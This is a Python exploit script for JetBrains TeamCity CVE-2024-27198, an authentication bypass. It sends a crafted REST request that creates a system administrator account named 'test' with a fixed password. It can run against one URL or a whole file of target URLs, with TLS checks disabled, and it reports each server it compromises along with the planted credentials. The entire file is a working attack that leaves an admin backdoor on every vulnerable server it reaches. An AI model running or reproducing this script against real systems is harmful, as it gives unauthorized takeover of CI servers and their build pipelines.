JetBrainsTeamCity_CVE-2024-27198_Authenticationbypass.py

import requests
from urllib.parse import urlparse,urljoin
import argparse
import urllib3
import ssl
import urllib.request
import random
import string
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def read_file(file_path):
    with open(file_path, 'r') as file:
        urls = file.read().splitlines()
    return urls

def check(url):
    try:
        url = url.rstrip('/')
        target = url + '/hax?jsp=/app/rest/users;.jsp'
        headers = {
            "User-Agent": 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36',
            'Content-Type': 'application/json'
        }
        data = '{\"username\": \"test\", \"password\": \"pass123kl\", \"email\": \"SystemInfo\", \"roles\": {\"role\": [{\"roleId\": \"SYSTEM_ADMIN\", \"scope\": \"g\"}]}}'
        response = urllib.request.Request(target, headers=headers, data=data.encode(), method="POST", unverifiable=True)
        res = urllib.request.urlopen(response)
        status_code = res.getcode()
        content = res.read().decode()
        if status_code == 200 and 'role' in content and 'USERS_GROUP' in content:
            print(f"\033[31mDiscovered:{url}: JetBrainsTeamCity_CVE-2024-27198_Authenticationbypass---test/pass123kl\033[0m")
            return True
    except Exception as e:
        pass


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL")
    parser.add_argument("-f", "--txt", help="file")
    args = parser.parse_args()
    url = args.url
    txt = args.txt
    if url:
        check(url)
    elif txt:
        urls = read_file(txt)
        for url in urls:
            check(url)